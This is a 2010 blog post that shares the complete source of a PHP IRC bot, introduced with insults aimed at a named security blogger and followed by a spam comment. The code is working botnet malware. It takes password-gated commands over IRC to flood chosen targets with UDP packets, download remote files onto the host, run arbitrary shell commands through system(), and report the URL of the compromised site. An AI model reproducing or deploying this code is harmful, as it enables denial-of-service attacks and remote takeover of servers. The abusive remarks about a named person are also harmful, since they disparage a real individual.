Old PHP Bot I Wrote
- June 5th, 2010
- Posted in General
- Write comment
I made this a long time ago when I was just getting into PHP and recently found it on mcgrewsecurity.com. Now I’ve never had any problems with mcgrew and have talked to him on a few occasions but I’ve recently found out what a giant piece of shit he is. Really all he does is run around on the web playing favorites and picks on retards to make himself look like a seasoned security professional. Anyway here’s the code
<? error_reporting(0); set_time_limit(0); // EDIT THIS $chan = ""; $server = ""; $port = 6667; $nickform = 'TestBot-%d'; $pass = ''; //md5 $hostauth = '10.0.0.1'; //ip or hostmask // STOP EDITTING NOW. $logged_in = 0; $rand = ""; for ($i = 0; $i < 8; $i++) { $rand .= mt_rand( 0, 9 ); } $nick = sprintf($nickform, $rand); $socket = fsockopen("$server", $port); fputs($socket,"USER $nick $nick $nick $nick :$nick\n"); fputs($socket,"NICK $nick\n"); fputs($socket,"JOIN ".$chan."\n"); while(1) { while($data = fgets($socket)) { echo nl2br($data); // flush(); $ex = explode(' ', $data); $rawcmd = explode(':', $ex[3]); $oneword = explode('<br>', $rawcmd); $channel = $ex[2]; $nicka = explode('@', $ex[0]); $nickb = explode('!', $nicka[0]); $nickc = explode(':', $nickb[0]); //header("Content-type: text/plain"); $host = $nicka[1]; $authnick = $ex[0]; //$nick = $nickc[1]; if($ex[0] == "PING"){ fputs($socket, "PONG ".$ex[1]."\n"); } $args = NULL; for ($i = 4; $i < count($ex); $i++) { $args .= $ex[$i] . ' '; } if (preg_match("/!auth/", $rawcmd[1]) && preg_match("/$hostauth/", $authnick)) { $attempt = trim($ex[4]); if (md5($attempt) === $pass) { $logged_in = 1; $authnick = $ex[0]; fputs($socket, "PRIVMSG ".$channel." Logged In \n"); } else {fputs($socket, "PRIVMSG ".$channel." Failed login attempt! ".md5($attempt)." \n"); } } elseif (preg_match("/!vuln/", $rawcmd[1]) && $logged_in == '1' && preg_match("/$hostauth/", $authnick)){ $server_name = $_SERVER['SERVER_NAME']; $req_uri = $_SERVER['REQUEST_URI']; $vuln = "http://".$server_name.$req_uri; fputs($socket, "PRIVMSG ".$channel." vuln url ".$vuln." \n"); } elseif (preg_match("/!pwn/", $rawcmd[1]) && $logged_in == '1' && preg_match("/$hostauth/", $authnick)) { $time = trim($ex[6]); $target = trim($ex[4]); $pkts = trim($ex[5]); fputs($socket, "PRIVMSG ".$channel." hitting ".$target." with $pkts pkts for $time seconds \n"); $packt = ""; for($i=0;$i<$pkts;$i++) { $packt .= chr(mt_rand(1,256)); } $timei = time(); $a = 0; while(time()-$timei < $time) { $fp=fsockopen("udp://".$target,mt_rand(1,256),$e,$s,5); fwrite($fp,$packt); fclose($fp); $a++; } $evv = $a * $pkts; $evv = $evv / 1048576; $vel = $evv / $time; $vel = round($vel); $evv = round($evv); fputs($socket, "PRIVMSG ".$channel." hit ".$target." with ".$evv."MB at ".$vel."MB/s \n"); } elseif (preg_match("/!down/", $rawcmd[1]) && $logged_in == '1' && preg_match("/$hostauth/", $authnick)) { $rfile = trim($ex[4]); $lfile = trim($ex[5]); if (!$fp = fopen($lfile, "w")) { fputs($socket, "PRIVMSG ".$channel." Permission Denied\n"); } else { if(!$get = file($rfile)) { fputs($socket, "PRIVMSG ".$channel." Download Failed \n"); } else { for($i=0;$i <= count($get); $i++) { fwrite($fp, $get[$i]); } fputs($socket, "PRIVMSG ".$channel." Download Succeeded \n"); fclose($fp); } } } elseif (preg_match("/!exec/", $rawcmd[1]) && $logged_in == '1' && preg_match("/$hostauth/", $authnick)) { $cmd = trim($ex[4]." ".$ex[5]." ".$ex[6]." ".$ex[7]." ".$ex[8]); if(!$resp = system($cmd)) { fputs($socket, "PRIVMSG ".$channel." Exec Failed \n"); } else { fputs($socket, "PRIVMSG ".$channel." Exec Succeeded \n"); } } elseif ($rawcmd[1] == "!gtfo" && $logged_in == '1' && preg_match("/$hostauth/", $authnick)) { fclose($socket); exit( ); } } }
It’s interesting to see how hard the content side is for some. Although, I find it funny that you wasted this much time in doing anything
w2tubl http://djb3jDdmjckow30cnjcmd61l0dy.com